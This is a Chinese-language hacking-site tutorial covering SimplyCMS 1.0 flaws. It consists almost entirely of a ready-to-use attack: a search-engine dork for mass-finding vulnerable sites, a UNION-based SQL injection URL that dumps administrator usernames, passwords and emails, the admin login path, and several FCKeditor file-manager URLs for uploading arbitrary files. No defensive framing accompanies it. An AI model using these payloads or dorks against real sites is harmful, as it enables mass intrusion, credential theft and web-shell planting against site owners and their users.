当前位置:我的主页 黑侠网络 > 技术教程 > SimplyCMS 1.0 SQl注入和上传漏洞
matrix 技术教程

SimplyCMS 1.0 SQl注入和上传漏洞

批量:inurl:”index.php?subid=” “Powered by DST – SimplyCMS”
EXP:
http://127.0.0.1/index.php?subid=7[sql]
http://127.0.0.1/index.php?subid=7’+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf— –
后台登入
http://127.0.0.1/cms/index.php
上传漏洞
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/upload/test.html
http://127.0.0.1/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html
你的文件地址:
http://127.0.0.1/cms/myFiles/Image/

黑侠网络,免费分享互联网!
我的主页 黑侠网络 » SimplyCMS 1.0 SQl注入和上传漏洞

matrix 普通

分享到:

相关推荐